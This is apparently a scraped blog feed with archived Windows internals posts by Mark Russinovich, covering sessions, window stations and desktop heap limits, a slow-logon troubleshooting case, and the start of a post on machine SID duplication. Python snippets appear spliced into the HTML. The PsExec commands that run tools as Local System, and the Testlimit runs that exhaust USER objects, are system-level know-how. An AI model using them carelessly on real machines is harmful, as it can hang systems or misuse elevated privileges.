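info = session_info()
if info is not None:
    print("session", info["session"], "on console:", on_physical_console(info))
```

<P> A process in a Remote Desktop session or in a session that was switched away from with Fast User Switching would report a session ID that differs from the console session ID. 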
</P> <P> Every process is uniquely associated with a specific session, which you can see when you add the Session column to Sysinternals <A href="#" target="_blank"> Process Explorer </A> . This screenshot, in which I’ve collapsed the process tree to show only processes that have no parent, is from a Remote Desktop Services (RDS – formerly Terminal Server Services) system that has four active sessions: session 0 is the dedicated session in which system processes execute on Windows Vista and higher; session 1 is the session in which I’m writing this post; Session 2 is the session of another user account that I’m concurrently logged into from another system; and finally, session 3 is one that Remote Desktop Services proactively created to be ready for the next interactive logon: </P> <P> <IMG alt="image" border="0" height="212" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121192i27C89125AE1069F8" title="image" width="355" /> </P> <P> Since every process is associated with a specific session and the operating system usually only needs access to the session-specific data of the current process’s session, Windows defines a view into a process’s session data in the process’s virtual address space. Thus, when the system switches between threads of different processes, it also switches address spaces, switching the current session view. When the Csrss.exe process of Session 0 is the current process, for example, the address space mappings include the system address space (which is included in every process’s address space), Csrss’s address space, and the Session 0 address space. The region of memory mapping a session’s data is known as Session View Space or Session Space. 
When the system switches to a thread from Session 1’s Explorer process, the mappings change accordingly, and when it switches to a thread from Notepad, the Session 1 Session Space remains mapped: </P> <P> <IMG alt="image" border="0" height="297" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_50.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121193i09F6E463B6BFD7A9" title="image" width="260" /> </P> <P> Note that the figure isn’t exactly correct for 32-bit Windows Vista and higher, since <A href="#" target="_blank"> dynamic system address space </A> means that the Session Space isn’t necessarily contiguous and can grow and shrink as required on those systems. </P> <P> The next concept is the <A href="#" target="_blank"> desktop </A> , an object defined by the window manager to represent a virtual display that includes the windows associated with the desktop (note that this is different than Explorer’s definition of a desktop, which is the user’s directory with shortcuts and other objects the user places there). The default desktop is named “Default”, but applications can create additional desktops and switch the connection to the logical display, something the <A href="#" target="_blank"> Sysinternals Desktops </A> utility uses to create up to four virtual desktops a user can switch between. </P> <P> Finally, to support multiple virtual displays that are associated with the same window manager instance, the window manager defines the <A href="#" target="_blank"> window station </A> object. 
A window station is associated with a particular session and a session can have multiple window stations, but each session has only one interactive window station, called <EM> WinSta0 </EM> , that can connect with a physical or logical display, keyboard and mouse; the other window stations are essentially “headless” and support for them exists solely to isolate processes that expect window manager services, but that shouldn’t display a user interface. For example, the system creates non-interactive window stations for each service account with which it associates processes running in the account, since Windows services should not display user interfaces. </P> <P> You can see the window stations associated with Session 0 by looking in the Object Manager namespace under the \Windows directory using the <A href="#" target="_blank"> Sysinternals Winobj </A> tool (viewing the directory requires running elevated with administrative privileges). Here you can see a window station that the Microsoft Windows Search Service creates to run search filters in, window stations for each of the three built-in service accounts (System, Network Service and Local Service), and Session 0’s interactive window station: </P> <P> <IMG alt="image" border="0" height="198" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121194iCA3661F5BBD54D92" title="image" width="304" /> </P> <P> You can see the window stations associated with other sessions in the Sessions directory in the Object Manager namespace. 
Here’s the only window station, the interactive WinSta0 window station, associated with my logon session: </P> <P> <IMG alt="image" border="0" height="238" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121195iC2B1E137459CD556" title="image" width="304" /> </P> <P> This diagram shows the relationship between sessions, window stations, and desktops for a system that has one user logged on to Session 1 on the physical console and another logged on to Session 2 via a remote desktop connection, where the user has run a virtual desktops utility and switched the display to Desktop1. </P> <P> <IMG alt="image" border="0" height="433" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_15.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121196i5820D58F40F16A60" title="image" width="450" /> </P> <P> Besides having an association with a particular session, processes are associated with a specific window station and desktop, though processes can switch between both and threads can switch between desktops. Thus, every process’s association can be represented with a hierarchical path like this: “Session 1\WinSta0\Default”. You can in most cases indirectly determine what window station and desktop a process is connected to by looking at its handle table in Process Explorer’s handle view to see the names of the objects it has open. 
This screenshot of the handle table of an Explorer process shows that it is connected to the Default desktop on WinSta0 of Session 1: </P> <P> <IMG alt="image" border="0" height="317" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121197i1505E2A859AEC435" title="image" width="344" /> </P> <H3> User Objects </H3> <P> With the fundamental concepts in hand, let’s turn our attention first to USER objects. <A href="#" target="_blank"> USER objects </A> get their name from the fact that they represent user interface elements like desktops, windows, menus, cursors, icons, and accelerator tables (menu keyboard shortcuts). Despite the fact that USER objects are associated with a specific desktop, they must be accessible from all the desktops of a session, for example to allow a process on one desktop to register for a hotkey that can be entered on any of them. For that reason, the window manager assigns USER object identifiers that are scoped to a window station. </P> <P> A basic limitation imposed by the window manager is that no process can create more than 10,000 USER objects. That limitation attempts to prevent a single process from exhausting the resources associated with USER objects, either because it’s programmed with algorithms that can create an excessive number of objects or because it leaks objects by allocating them and not deleting them when it’s through using them. 
You can easily verify this limit by running the Sysinternals <A href="#" target="_blank"> Testlimit </A> utility with the –u switch, which directs Testlimit to create as many USER objects as it can: </P> <P> <IMG alt="image" border="0" height="121" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_12.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121198iA9C6A7C36D4C4917" title="image" width="554" /> </P> <P> The window manager keeps track of how many USER objects a process allocates, which you can see when you add the USER Objects column to Process Explorer’s display, so that you can keep tabs on the number of objects processes allocate. This screenshot shows that, as expected, Windows system processes, including Lsass.exe (the Local Security Authority Subsystem) and service processes like Svchost, don’t allocate USER objects because they have no user interface: </P> <P> <IMG alt="image" border="0" height="213" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_46.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121199i2A943DF78EB82AF2" title="image" width="260" /> </P> <P> Process Explorer shows the number of USER objects a process has allocated on the Performance page of a process’s process properties dialog: </P> <P> <IMG alt="image" border="0" height="121" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_53.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121200iA5E4C714ACA2AB5A" title="image" width="227" /> </P> <P> One fundamental limitation on the number of USER objects comes from the fact that their identifiers were 16-bit values in the first versions of Windows, which were 16-bit. 
When 32-bit support was added in later versions, USER identifiers had to remain restricted to 16-bit values so that 16-bit processes could interact with windows and other USER objects created by 32-bit processes. Thus, 65,535 (2^16 - 1) is the limit on the total number of USER objects that can be created on a session (and for historical reasons, windows must have even-numbered identifiers, so there can be a maximum of 32,768 windows per session). You can verify this limit by running multiple copies of Testlimit with the –u switch until you can’t create any more. Assuming the processes you already have running aren’t using an excessive number of objects, you should be able to run 7 copies, where the first 6 allocate 10,000 objects each and the last allocates the difference between the number of already allocated objects and 65,535: </P> <P> <IMG alt="image" border="0" height="375" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_14.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121201i873C8FC63A62764A" title="image" width="554" /> </P> <P> Be sure that you’re prepared to hard power-off your system when you do this because the desktop may become unusable. Many operations, even opening the Start menu’s shutdown menu, require USER objects, and when no more can be allocated the system will behave in bizarre ways. I wasn’t even able to terminate a Notepad process I had running by clicking on its close menu button after USER objects had been exhausted. </P> <P> So far I’ve talked only about the limits associated with the absolute number of USER objects a process or window station can allocate, but there are other limits caused by the storage used for the USER objects themselves. Each desktop has its own region of memory, called the desktop heap, from which most USER objects created on the desktop are allocated. 
Because desktop heaps are stored in Session Space and 32-bit address spaces limit the amount of kernel-mode address space, the sizes of desktop heaps are capped at a relatively modest amount. They also vary in size depending on the type of desktop they are for and whether the system is a 32-bit or 64-bit system. </P> <P> Matthew Justice’s <A href="#" target="_blank"> Desktop Heap Overview </A> and <A href="#" target="_blank"> Desktop Heap, Part 2 </A> articles from the NT Debugging Blog do an excellent job of documenting desktop heap sizes up through Windows Vista SP1. This table summarizes the sizes across Windows versions up through Windows Server 2008 R2: </P> <TABLE border="1" cellpadding="0" cellspacing="0" width="615"> <TBODY> <TR> <TD valign="top" width="166"> </TD> <TD align="center" valign="top" width="92"> <STRONG> Interactive Desktop </STRONG> </TD> <TD align="center" valign="top" width="117"> <STRONG> Non-Interactive Desktop </STRONG> </TD> <TD align="center" valign="top" width="114"> <STRONG> Winlogon Desktop </STRONG> </TD> <TD align="center" valign="top" width="124"> <STRONG> Disconnect Desktop </STRONG> </TD> </TR> <TR> <TD valign="top" width="166"> <STRONG> Windows XP 32-bit </STRONG> </TD> <TD align="center" valign="top" width="92"> 3 MB </TD> <TD align="center" valign="top" width="117"> 512 KB </TD> <TD align="center" valign="top" width="114"> 128 KB </TD> <TD align="center" valign="top" width="124"> 64 KB </TD> </TR> <TR> <TD valign="top" width="166"> <STRONG> Windows Server 2003 32-bit </STRONG> </TD> <TD align="center" valign="top" width="92"> 3 MB </TD> <TD align="center" valign="top" width="117"> 512 KB </TD> <TD align="center" valign="top" width="114"> 128 KB </TD> <TD align="center" valign="top" width="124"> 64 KB </TD> </TR> <TR> <TD valign="top" width="166"> <STRONG> Windows Server 2003 64-bit </STRONG> </TD> <TD align="center" valign="top" width="92"> 20 MB </TD> <TD align="center" valign="top" width="117"> 768 KB </TD> <TD 
align="center" valign="top" width="114"> 192 KB </TD> <TD align="center" valign="top" width="124"> 96 KB </TD> </TR> <TR> <TD valign="top" width="166"> <STRONG> Windows Vista/Windows Server 2008 32-bit </STRONG> </TD> <TD align="center" valign="top" width="92"> 12 MB </TD> <TD align="center" valign="top" width="117"> 512 KB </TD> <TD align="center" valign="top" width="114"> 128 KB </TD> <TD align="center" valign="top" width="124"> 64 KB </TD> </TR> <TR> <TD valign="top" width="166"> <STRONG> Windows Vista/Windows Server 2008 64-bit </STRONG> </TD> <TD align="center" valign="top" width="92"> 20 MB </TD> <TD align="center" valign="top" width="117"> 768 KB </TD> <TD align="center" valign="top" width="114"> 192 KB </TD> <TD align="center" valign="top" width="124"> 96 KB </TD> </TR> <TR> <TD valign="top" width="166"> <STRONG> Windows 7 32-bit </STRONG> </TD> <TD align="center" valign="top" width="92"> 12 MB </TD> <TD align="center" valign="top" width="117"> 512 KB </TD> <TD align="center" valign="top" width="114"> 128 KB </TD> <TD align="center" valign="top" width="124"> 64 KB </TD> </TR> <TR> <TD valign="top" width="166"> <STRONG> Windows 7/Windows Server 2008 R2 64-bit </STRONG> </TD> <TD align="center" valign="top" width="92"> 20 MB </TD> <TD align="center" valign="top" width="117"> 768 KB </TD> <TD align="center" valign="top" width="114"> 192 KB </TD> <TD align="center" valign="top" width="124"> 96 KB </TD> </TR> </TBODY> </TABLE> <P> It’s worth noting that the original release of Windows Vista 32-bit had the 3 MB Interactive Heap size that previous 32-bit versions of Windows had. After the release our telemetry showed us that some users occasionally ran out of heap, presumably because they were running more applications on systems that had more memory, so SP1 raised the size to 12 MB. It’s also possible to override the default desktop heap sizes with registry settings described in Matthew’s article. 
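</P> <P> To check which desktop heap sizes a system is configured with, you can read the override directly. The following is a minimal sketch, assuming the override is the SharedSection setting inside the Windows value under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems, with three comma-separated sizes in KB (system-wide shared heap, interactive desktop heap, non-interactive desktop heap) as described in the Desktop Heap Overview article. The sample string and the helper name parse_shared_section are illustrative and not copied from a real system. </P>

```python
import re


def parse_shared_section(windows_value):
    """Extract the three SharedSection sizes (in KB) from the subsystem start-up string."""
    match = re.search(r"SharedSection=(\d+),(\d+),(\d+)", windows_value)
    if match is None:
        raise ValueError("no three-field SharedSection setting found")
    shared, interactive, non_interactive = (int(field) for field in match.groups())
    return {
        "shared_kb": shared,
        "interactive_kb": interactive,
        "non_interactive_kb": non_interactive,
    }


# Illustrative value shaped like the 32-bit Windows XP defaults in the table above.
sample = (r"%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows "
          r"SharedSection=1024,3072,512 Windows=On SubSystemType=Windows")

sizes = parse_shared_section(sample)
print("interactive desktop heap:", sizes["interactive_kb"] // 1024, "MB")
print("non-interactive desktop heap:", sizes["non_interactive_kb"], "KB")
```

<P> The second and third fields line up with the Interactive Desktop and Non-Interactive Desktop columns of the table, so a value that differs from the table indicates that someone has overridden the defaults. 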
</P> <P> On versions of Windows prior to Windows Vista, you can use the Microsoft <A href="#" target="_blank"> Desktop Heap Monitor </A> tool to view the sizes of the Desktop Heaps and how much of each is in use. Here’s the output of the tool on a 32-bit Windows XP system showing that only 5.6% of heap (172 KB) on the interactive desktop, Default, has been consumed: </P> <P> <IMG alt="image" border="0" height="200" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_16.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121202iE2C1C580ED033809" title="image" width="504" /> </P> <P> The tool hasn’t been updated for Windows Vista because the larger desktop heap sizes on newer versions of Windows mean that desktop heap is rarely exhausted before other USER object limits are hit. However, you can use Testlimit with the –u and –i switches to see how the system behaves when interactive desktop heap exhaustion occurs. The switch combination has Testlimit create window class data structures that have 4 KB of extra class storage until it fails. Here’s the output of Testlimit when run immediately after I captured the above Desktop Heap Monitor output. 
2823 KB plus the 172 KB that Desktop Heap Monitor said was already allocated equals about 3 MB: </P> <P> <IMG alt="image" border="0" height="118" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image70_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121203i5496049C8FF538F1" title="image" width="396" /> </P> <P> Though there’s no way to determine how much heap is in use on newer systems, the window manager writes an event to the system event log when there’s heap exhaustion that can help troubleshoot window manager issues: </P> <P> <IMG alt="image" border="0" height="315" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_18.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121204iA4BF29297697EBCD" title="image" width="454" /> </P> <P> That covers USER object limits. Stay tuned for Part 2, where I’ll discuss the limits related to window manager GDI objects. 
</P> </BODY></HTML> Thu, 27 Jun 2019 07:00:28 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-user-and-gdi-objects-8211-part-1/ba-p/723881 MarkRussinovich 2019-06-27T07:00:28Z The Case of the Slow Logons https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-slow-logons/ba-p/723866 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jan 12, 2010 </STRONG> <BR /> <P> <EM> Update:&nbsp; The Active Directory team has released useful guides for troubleshooting slow logon issues: </EM> </P> <UL> <LI> <A href="#" target="_blank"> <EM> http://social.technet.microsoft.com/wiki/contents/articles/10130.root-causes-for-slow-boots-and-logons.aspx </EM> </A> </LI> <LI> <A href="#" target="_blank"> <EM> http://social.technet.microsoft.com/wiki/contents/articles/10128.tools-for-troubleshooting-slow-boots-and-slow-logons.aspx </EM> </A> </LI> <LI> <A href="#" target="_blank"> <EM> http://social.technet.microsoft.com/wiki/contents/articles/10123.troubleshooting-slow-operating-system-boot-times-and-slow-user-logons.aspx </EM> </A> </LI> </UL> <P> Emails containing troubleshooting cases keep arriving in my inbox. I’ve received many cases that start with a seemingly unsolvable problem and end a few steps later with a solution or - often just as useful - a workaround. I’ve amassed several hundred such cases that I’ve captured in over 400 PowerPoint slides, giving me great material from which to draw for my blog and the <EM> Case of the Unexplained </EM> talk series I’ve delivered at a number of major industry conferences. </P> <P> I’m always looking for fresh cases, uses of obscure tool features, and unique troubleshooting techniques, so please keep them coming. 
This time, I’m sharing a fascinating case that highlights two useful techniques: comparing Sysinternals <A href="#" target="_blank"> Process Monitor </A> logs from working and problematic systems, and using Sysinternals <A href="#" target="_blank"> PsExec </A> to capture activity during a logon. </P> <P> The case began when a systems administrator at a large company received multiple end-user complaints that logon was taking over three minutes. The users didn’t encounter any problems once logged on, but the delays were understandably frustrating. Many other users running the same software configuration weren’t experiencing issues, however. Looking for commonalities, the administrator queried the network configuration database and, sure enough, saw that all the systems with complaints were Dell Precision 670 workstations. He thought he had a major clue until he looked further and saw that the systems running without issue included seemingly identical 670 workstations. </P> <P> Looking for clues more directly, his next step was to try to analyze the logon process of the delayed systems. He used PsExec to run <A href="#" target="_blank"> Process Explorer </A> in the Local System account so that it would survive a logoff and be active at the next logon. Because the systems were running Windows XP, the command line he used was the following (see the end of the post for how to do this on Windows Vista and higher): </P> <BLOCKQUOTE> <P> <FONT face="cour"> psexec -sid c:\sysint\procexp.exe </FONT> </P> </BLOCKQUOTE> <P> The “-s” directs PsExec to launch the process in the Local System account, “-i” to connect the process with the interactive desktop so that its windows are visible, and “-d” to return immediately instead of waiting for the process to terminate. 
Note that if you have Fast User Switching enabled and you are not logged into session 0, do not log out; instead, switch users, log in to the problematic account, and then switch back to the session from which you started PsExec. </P> <P> At the subsequent logon, he noticed that Lisa_client_7.0.0.0.exe, the company’s own system inventory line-of-business (LoB) application, consumed CPU for a short time, went idle for three minutes, then exited, after which the logon process would continue as normal: </P> <P> <IMG alt="image" border="0" height="71" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheLogonScriptHangs_CCDE/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121187i7B5DB4CE1BABDBDE" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> <A href="#" target="_blank"> David Solomon </A> coined a phrase back before Process Monitor replaced Filemon and Regmon that still applies when updated: “When in doubt, run Process Monitor!” (I follow this advice religiously, even having my daughter run Process Monitor when she comes to me with a homework question.) This case is a great example of that philosophy put into practice because it seems unlikely on the surface that Process Monitor would reveal the cause of a process hang, but the administrator turned to the tool nonetheless. </P> <P> After launching Process Monitor with PsExec and capturing a logon trace, he scrolled to the beginning of the captured data and started his analysis. 
Because of what he saw in Process Explorer, the Lisa_client process was the obvious suspect, so he right-clicked on its process name in one of the trace lines and selected the <EM> Include </EM> quick-filter menu item to remove from the display entries related to activity from other processes: </P> <P> <IMG alt="image" border="0" height="219" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheLogonScriptHangs_CCDE/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121188i5E0D82F9D2D589BB" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="249" /> </P> <P> When troubleshooting a hang with Process Monitor, you should first see if there are any gaps in operation time stamps that match the hang duration. You can look for lengthy operations by adding the <EM> Duration </EM> column to the display and then making sure to filter out operations that commonly don’t immediately complete, like directory change notifications. That can be useful when you don’t see a significant time gap between operations because the process has multiple threads, some of which continue to operate while the one causing the hang is dormant. 
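</P> <P> The hunt for time gaps described above can also be sketched in code. What follows is a minimal illustration in Python, not a Process Monitor feature: it assumes the trace has already been reduced to (seconds, operation) pairs, and the name find_gaps and the sample events are hypothetical, made up for this example rather than taken from the administrator’s trace. </P>

```python
from typing import List, Tuple

# (seconds since the start of the trace, operation name)
Event = Tuple[float, str]


def find_gaps(events: List[Event], min_gap: float) -> List[Tuple[Event, Event, float]]:
    """Return (before, after, gap_seconds) for consecutive events
    that are separated by at least min_gap seconds."""
    ordered = sorted(events, key=lambda e: e[0])
    gaps = []
    for before, after in zip(ordered, ordered[1:]):
        delta = after[0] - before[0]
        if delta >= min_gap:
            gaps.append((before, after, delta))
    return gaps


# Made-up sample data for illustration only.
sample = [
    (0.000, "RegOpenKey"),
    (0.004, "CreateFile"),
    (0.010, "DeviceIoControl"),
    (180.012, "CloseFile"),
    (180.020, "Process Exit"),
]

for before, after, delta in find_gaps(sample, min_gap=60.0):
    print(f"{delta:.1f}s gap after {before[1]!r}, before {after[1]!r}")
```

<P> Under the same assumptions, grouping the events by thread before calling the function would expose a stall on one thread that is otherwise masked by activity on the others, which is the situation where the Duration column helps. 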
</P> <P> To his pleasant surprise, he soon found an event that not only preceded a gap of exactly three minutes, but that had an unusual result code, IO DEVICE ERROR: </P> <P> <IMG alt="image" border="0" height="69" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheLogonScriptHangs_CCDE/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121189i50F5ECEA30C99E68" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> It appeared that the Lisa_client process performed a SCSI pass-through command to the disk hosting the C: volume that timed-out after three minutes with a hardware error. Wondering what the result of the command was on one of the 670’s that logged on promptly, he captured a trace from one and saw that the corresponding operation took less than a millisecond and was successful: </P> <P> <IMG alt="image" border="0" height="66" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheLogonScriptHangs_CCDE/image_thumb_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121190iB5795B5951144D51" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The evidence clearly pointed at a hardware issue with the disks installed on a subset of the 670’s, so he gathered disk type data from all the 670’s, correlated them with the reports of slow logons, and found that all of the slow systems had Seagate disks and the others had Fujitsu disks. </P> <P> His company was obviously not going to replace disks just to avoid an issue being caused by its own LoB application, so he had to figure out a workaround. 
He notified the Lisa_client development team, who reported that they could remove the command without loss of functionality, but that it would take at least several days for the update to go through their internal release process. Having a few days where system information wouldn’t be collected for a subset of systems was less important than end-user productivity, so in the meantime he wrote a WMI logon script to query the system disk and launch Lisa_client only if it wasn’t a Seagate model. </P> <P> Without Process Monitor’s help he would have probably determined that the disks were the key hardware difference, but it’s not clear he would have discovered the root cause and been able to work around it rather than resort to replacing disks. This is yet another case solved with the help of Process Monitor and insightful detective work. </P> <P> In closing, I mentioned that I would provide steps for configuring an application to survive logoff and logon on Windows Vista, Windows Server 2008 and higher. The PsExec command I supplied for Windows XP won’t work on newer operating systems because Windows Vista introduced <A href="#" target="_blank"> Session 0 Isolation </A> , requiring a couple of extra commands to make the launched application accessible after a logon. First, start the utility in session 0 with this PsExec command in an elevated command prompt: </P> <BLOCKQUOTE> <P> <FONT face="cour"> psexec -sd -i 0 c:\sysint\procmon.exe </FONT> </P> </BLOCKQUOTE> <P> You’ll see a window titled “Interactive services dialog detection” flash in the taskbar, indicating that a process is running with a window on the hidden session 0 desktop. 
Click on the taskbar window to restore the notification dialog and then on the Show Me the Message button to switch to that desktop: </P> <P> <IMG alt="image" border="0" height="201" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheLogonScriptHangs_CCDE/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121191iCCEDABBC5CD8B844" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="404" /> </P> <P> The utility you launched will be visible there and you can configure it with the desired settings (it’s running in the Local System account, so it won’t have your own account’s defaults). When done, click on the Return button to get back to the main desktop. You can now log off and log back on to reproduce the problem you’re investigating. After logging on again, execute the following commands in an elevated command prompt to cause the doorway to the session 0 desktop to reappear: </P> <BLOCKQUOTE> <P> <FONT face="cour"> net stop ui0detect <BR /> </FONT> <FONT face="cour"> net start ui0detect </FONT> </P> </BLOCKQUOTE> <P> Go back to the session 0 desktop to look at the captured information and close the tool. </P> <P> One last thing I want to leave you with is a reminder that I’ve documented many other troubleshooting cases in this blog and you can find them in the blog index <A href="#" target="_blank"> here </A> . You can also watch recordings of my <EM> Case of the Unexplained </EM> sessions from TechEd <A href="#" target="_blank"> here </A> and be sure to come to <A href="#" target="_blank"> TechEd US this June in New Orleans </A> , where I’ll be delivering it again with all new cases. 
</P> </BODY></HTML> Thu, 27 Jun 2019 06:58:58 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-slow-logons/ba-p/723866 MarkRussinovich 2019-06-27T06:58:58Z The Machine SID Duplication Myth (and Why Sysprep Matters) https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-machine-sid-duplication-myth-and-why-sysprep-matters/ba-p/723859 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Nov 03, 2009 </STRONG> <BR /> <P> On November 3, 2009, Sysinternals retired <A href="#" mce_href="#" target="_blank"> NewSID </A> , a utility that changes a computer’s <EM> machine Security Identifier </EM> (machine SID). I wrote NewSID in 1997 (its original name was NTSID) because the only tool available at the time for changing machine SIDs was the Microsoft <A href="#" mce_href="#" target="_blank"> Sysprep </A> tool, and Sysprep doesn’t support changing the SIDs of computers that have applications installed. A machine SID is a unique identifier generated by Windows Setup that Windows uses as the basis for the SIDs for administrator-defined local accounts and groups. After a user logs on to a system, they are represented by their account and group SIDs with respect to object authorization (permissions checks). If two machines have the same machine SID, then accounts or groups on those systems might have the same SID. It’s therefore obvious that having multiple computers with the same machine SID on a network poses a security risk, right? At least that’s been the conventional wisdom. </P> <P> The reason that I began considering NewSID for retirement is that, although people generally reported success with it on Windows Vista, I hadn’t fully tested it myself and I got occasional reports that some Windows component would fail after NewSID was used. When I set out to look into the reports I took a step back to understand how duplicate SIDs could cause problems, a belief that I had taken on faith like everyone else. 
The more I thought about it, the more I became convinced that machine SID duplication – having multiple computers with the same machine SID – doesn’t pose any problem, security or otherwise. I took my conclusion to the Windows security and deployment teams and no one could come up with a scenario where two systems with the same machine SID, whether in a Workgroup or a Domain, would cause an issue. At that point the decision to retire NewSID became obvious. </P> <P> I realize that the news that it’s okay to have duplicate machine SIDs comes as a surprise to many, especially since changing SIDs on imaged systems has been a fundamental principle of image deployment since Windows NT’s inception. This blog post debunks the myth with facts by first describing the machine SID, explaining how Windows uses SIDs, and then showing that - with one exception - Windows never exposes a machine SID outside its computer, proving that it’s okay to have systems with the same machine SID. Note that Sysprep resets other machine-specific state that, if duplicated, can cause problems for certain applications like Windows Server Update Services (WSUS), so Microsoft’s support policy will still require cloned systems to be made unique with Sysprep. </P> <P mce_keep="true"> </P> <H3> SIDs </H3> <P> Windows uses SIDs to represent not just machines, but all <EM> security principals. </EM> Security principals include machines, domain computer accounts, users and security groups. Names are simply user-friendly representations for SIDs, allowing you to rename an account and not have to update access control lists (ACLs) that reference the account to reflect the change. A SID is a variable-length numeric value that consists of a structure revision number, a 48-bit identifier authority value, and a variable number of 32-bit subauthority or relative identifier (RID) values. The authority value identifies the agent that issued the SID, and this agent is typically a Windows local system or a domain. 
Subauthority values identify trustees relative to the issuing authority, and RIDs are simply a way for Windows to create unique SIDs based on a common base SID. </P> <P> You can use the Sysinternals <A href="#" mce_href="#" target="_blank"> PsGetSid </A> tool to view a machine’s SID by running it with no command-line arguments: </P> <P> <IMG alt="image" border="0" height="144" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121179i70E1255B17FD53B9" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Here, the revision number is 1, the authority is 5, and there are four subauthority values. At one point during the design of Windows NT, the machine SID might have been used for network identification, so in order to assure uniqueness, the SID that Setup generates has one fixed subauthority value (21) and three randomly-generated subauthority values (the numbers following “S-1-5-21” in the output). </P> <P> Even before you create the first user account on a system, Windows defines several built-in users and groups, including the Administrator and Guest accounts. Instead of generating new random SIDs for these accounts, Windows ensures their uniqueness by simply appending a per-account unique number, called a <EM> Relative Identifier </EM> (RID), to the machine SID. 
